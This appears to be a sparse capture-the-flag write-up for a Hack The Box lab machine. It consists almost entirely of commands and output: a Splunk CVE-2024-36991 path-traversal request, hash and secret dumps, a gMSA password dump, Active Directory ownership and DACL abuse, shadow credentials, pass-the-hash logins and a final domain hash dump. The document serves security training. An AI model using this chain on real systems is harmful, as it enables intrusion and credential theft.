nmap -A -v -T4 10.10.11.61
https://github.com/Mr-xn/CVE-2024-36991
可以利用这个 PoC 直接触发 LFI 漏洞
https://github.com/bigb0x/CVE-2024-36991
python3 CVE-2024-36991.py -u http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
https://github.com/HurricaneLabs/splunksecrets.git
splunksecrets splunk-decrypt -S splunk.secret
netexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
Administrator
Guest
krbtgt
paul.taylor
mark.adams
edward.martin
alexander.green
DC01$
Haze-IT-Backup$
netexec winrm haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
evil-winrm -i haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
https://github.com/micahvandeusen/gMSADumper
python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Haze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01eda60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95
impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
python3 getTGT.py haze.htb/Haze-IT-Backup$ -hashes ':a70df6599d5eab1502b38f9c1c3fd828'
export KRB5CCNAME=Haze-IT-Backup$.ccache
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u $'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" $'Haze-IT-Backup$'
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add shadowCredentials "edward.martin"
openssl pkcs12 -export -out ikun.pfx -inkey AyYeZBye_priv.pem -in AyYeZBye_cert.pem
certipy auth -pfx ikun.pfx -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61 -debug
aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af
evil-winrm -i 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af
https://github.com/0xjpuff/reverse_shell_splunk
ss *
Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::
paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::
alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::
Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:a70df6599d5eab1502b38f9c1c3fd828:::
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。